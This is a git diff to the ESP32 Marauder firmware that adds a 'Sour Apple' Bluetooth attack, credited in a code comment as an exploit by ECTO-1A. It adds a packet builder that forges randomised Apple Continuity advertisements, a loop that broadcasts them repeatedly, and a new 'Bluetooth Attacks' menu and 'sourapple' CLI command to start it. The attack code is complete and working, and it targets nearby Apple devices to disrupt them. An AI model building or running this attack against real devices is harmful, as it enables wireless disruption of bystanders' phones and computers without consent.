diff --git a/README.md b/README.md
index d4eb46ee1..eba2b1c49 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
-# ESP32 Marauder v0.12.1
+# ESP32 Marauder v0.13.0
A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32
diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp
index 75c02a5d3..c4ac82fca 100644
--- a/esp32_marauder/CommandLine.cpp
+++ b/esp32_marauder/CommandLine.cpp
@@ -249,6 +249,7 @@ void CommandLine::runCommand(String input) {
// Bluetooth sniff/scan
#ifdef HAS_BT
Serial.println(HELP_BT_SNIFF_CMD);
+ Serial.println(HELP_BT_SOUR_APPLE_CMD);
#ifdef HAS_GPS
Serial.println(HELP_BT_WARDRIVE_CMD);
#endif
@@ -771,6 +772,18 @@ void CommandLine::runCommand(String input) {
Serial.println("Bluetooth not supported");
#endif
}
+ else if (cmd_args.get(0) == BT_SOUR_APPLE_CMD) {
+ #ifdef HAS_BT
+ Serial.println("Starting Sour Apple attack. Stop with " + (String)STOPSCAN_CMD);
+ #ifdef HAS_SCREEN
+ display_obj.clearScreen();
+ menu_function_obj.drawStatusBar();
+ #endif
+ wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
+ #else
+ Serial.println("Bluetooth not supported");
+ #endif
+ }
// Wardrive
else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
#ifdef HAS_BT
diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h
index 611c24c7a..157e57973 100644
--- a/esp32_marauder/CommandLine.h
+++ b/esp32_marauder/CommandLine.h
@@ -77,6 +77,7 @@ const char PROGMEM SSID_CMD[] = "ssid";
// Bluetooth sniff/scan
const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
+const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
@@ -122,6 +123,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r ";
// Bluetooth sniff/scan
const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
+const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
const char PROGMEM HELP_FOOT[] = "==================================";
diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
index 3c94dd0ba..e5151bd60 100644
--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -494,6 +494,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -550,6 +551,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1073,6 +1075,7 @@ void MenuFunctions::RunSetup()
// Bluetooth menu stuff
bluetoothSnifferMenu.list = new LinkedList();
+ bluetoothAttackMenu.list = new LinkedList();
// Settings stuff
generateSSIDsMenu.list = new LinkedList();
@@ -1095,6 +1098,7 @@ void MenuFunctions::RunSetup()
wifiAttackMenu.name = text_table1[21];
wifiGeneralMenu.name = text_table1[22];
bluetoothSnifferMenu.name = text_table1[23];
+ bluetoothAttackMenu.name = "Bluetooth Attacks";
generateSSIDsMenu.name = text_table1[27];
clearSSIDsMenu.name = text_table1[28];
clearAPsMenu.name = text_table1[29];
@@ -1371,6 +1375,9 @@ void MenuFunctions::RunSetup()
this->addNodes(&bluetoothMenu, text_table1[31], TFT_YELLOW, NULL, SNIFFERS, [this]() {
this->changeMenu(&bluetoothSnifferMenu);
});
+ this->addNodes(&bluetoothMenu, "Bluetooth Attacks", TFT_RED, NULL, ATTACKS, [this]() {
+ this->changeMenu(&bluetoothAttackMenu);
+ });
// Build bluetooth sniffer Menu
bluetoothSnifferMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
@@ -1402,6 +1409,17 @@ void MenuFunctions::RunSetup()
wifi_scan_obj.StartScan(BT_SCAN_SKIMMERS, TFT_MAGENTA);
});
+ // Bluetooth Attack menu
+ bluetoothAttackMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
+ this->addNodes(&bluetoothAttackMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
+ this->changeMenu(bluetoothAttackMenu.parentMenu);
+ });
+ this->addNodes(&bluetoothAttackMenu, "Sour Apple", TFT_GREEN, NULL, DEAUTH_SNIFF, [this]() {
+ display_obj.clearScreen();
+ this->drawStatusBar();
+ wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
+ });
+
// Device menu
deviceMenu.parentMenu = &mainMenu;
this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
diff --git a/esp32_marauder/MenuFunctions.h b/esp32_marauder/MenuFunctions.h
index df45a0eb5..eb814a714 100644
--- a/esp32_marauder/MenuFunctions.h
+++ b/esp32_marauder/MenuFunctions.h
@@ -144,6 +144,7 @@ class MenuFunctions
// Bluetooth menu stuff
Menu bluetoothSnifferMenu;
+ Menu bluetoothAttackMenu;
// Settings things menus
Menu generateSSIDsMenu;
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index 7642ec59a..2bbe73b7c 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -18,6 +18,36 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
}
#ifdef HAS_BT
+ //ESP32 Sour Apple by RapierXbox
+ //Exploit by ECTO-1A
+ NimBLEAdvertising *pAdvertising;
+
+ NimBLEAdvertisementData getOAdvertisementData() {
+ NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
+ uint8_t packet[17];
+ uint8_t size = 17;
+ uint8_t i = 0;
+
+ packet[i++] = size - 1; // Packet Length
+ packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
+ packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
+ packet[i++] = 0x00; // ...
+ packet[i++] = 0x0F; // Type
+ packet[i++] = 0x05; // Length
+ packet[i++] = 0xC1; // Action Flags
+ const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
+ packet[i++] = types[rand() % sizeof(types)]; // Action Type
+ esp_fill_random(&packet[i], 3); // Authentication Tag
+ i += 3;
+ packet[i++] = 0x00; // ???
+ packet[i++] = 0x00; // ???
+ packet[i++] = 0x10; // Type ???
+ esp_fill_random(&packet[i], 3);
+
+ randomAdvertisementData.addData(std::string((char *)packet, 17));
+ return randomAdvertisementData;
+ }
+
class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
void onResult(BLEAdvertisedDevice *advertisedDevice) {
@@ -412,6 +442,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
RunBluetoothScan(scan_mode, color);
#endif
}
+ else if (scan_mode == BT_ATTACK_SOUR_APPLE) {
+ #ifdef HAS_BT
+ RunSourApple(scan_mode, color);
+ #endif
+ }
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
@@ -515,10 +550,11 @@ bool WiFiScan::shutdownWiFi() {
bool WiFiScan::shutdownBLE() {
#ifdef HAS_BT
if (this->ble_initialized) {
+ pAdvertising->stop();
pBLEScan->stop();
pBLEScan->clearResults();
- BLEDevice::deinit();
+ NimBLEDevice::deinit();
#ifdef MARAUDER_FLIPPER
flipper_led.offLED();
@@ -574,6 +610,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
else if ((currentScanMode == BT_SCAN_ALL) ||
+ (currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
@@ -1359,6 +1396,15 @@ void WiFiScan::RunPwnScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}
+void WiFiScan::executeSourApple() {
+ delay(40);
+ NimBLEAdvertisementData advertisementData = getOAdvertisementData();
+ pAdvertising->setAdvertisementData(advertisementData);
+ pAdvertising->start();
+ delay(20);
+ pAdvertising->stop();
+}
+
void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
@@ -1708,6 +1754,31 @@ void WiFiScan::RunProbeScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}
+void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
+ #ifdef HAS_BT
+ NimBLEDevice::init("");
+ NimBLEServer *pServer = NimBLEDevice::createServer();
+
+ pAdvertising = pServer->getAdvertising();
+
+ #ifdef HAS_SCREEN
+ display_obj.TOP_FIXED_AREA_2 = 48;
+ display_obj.tteBar = true;
+ display_obj.print_delay_1 = 15;
+ display_obj.print_delay_2 = 10;
+ display_obj.initScrollValues(true);
+ display_obj.tft.setTextWrap(false);
+ display_obj.tft.setTextColor(TFT_BLACK, color);
+ display_obj.tft.fillRect(0,16,240,16, color);
+ display_obj.tft.drawCentreString("Sour Apple",120,16,2);
+ display_obj.touchToExit();
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ #endif
+
+ this->ble_initialized;
+ #endif
+}
+
// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
@@ -4033,6 +4104,25 @@ void WiFiScan::main(uint32_t currentTime)
channelHop();
}
}
+ else if (currentScanMode == BT_ATTACK_SOUR_APPLE) {
+ #ifdef HAS_BT
+ if (currentTime - initTime >= 1000) {
+ initTime = millis();
+ String displayString = "";
+ String displayString2 = "";
+ displayString.concat("Advertising Data...");
+ for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
+ displayString2.concat(" ");
+ #ifdef HAS_SCREEN
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ display_obj.showCenterText(displayString2, 160);
+ display_obj.showCenterText(displayString, 160);
+ #endif
+ }
+
+ this->executeSourApple();
+ #endif
+ }
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
index be65731e1..6392388e6 100644
--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -81,6 +81,7 @@
#define WIFI_SCAN_STATION_WAR_DRIVE 33
#define BT_SCAN_WAR_DRIVE 34
#define BT_SCAN_WAR_DRIVE_CONT 35
+#define BT_ATTACK_SOUR_APPLE 36
#define GRAPH_REFRESH 100
@@ -249,6 +250,7 @@ class WiFiScan
void save_mac(unsigned char* mac);
void clearMacHistory();
void executeWarDrive();
+ void executeSourApple();
void startWardriverWiFi();
void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
@@ -281,6 +283,7 @@ class WiFiScan
void RunProbeScan(uint8_t scan_mode, uint16_t color);
void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
+ void RunSourApple(uint8_t scan_mode, uint16_t color);
void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
void RunEvilPortal(uint8_t scan_mode, uint16_t color);
bool checkMem();
diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h
index 5ec75dd26..070aeb2c1 100644
--- a/esp32_marauder/configs.h
+++ b/esp32_marauder/configs.h
@@ -22,7 +22,7 @@
//#define XIAO_ESP32_S3
//// END BOARD TARGETS
- #define MARAUDER_VERSION "v0.12.2"
+ #define MARAUDER_VERSION "v0.13.0"
//// BOARD FEATURES
#ifdef MARAUDER_M5STICKC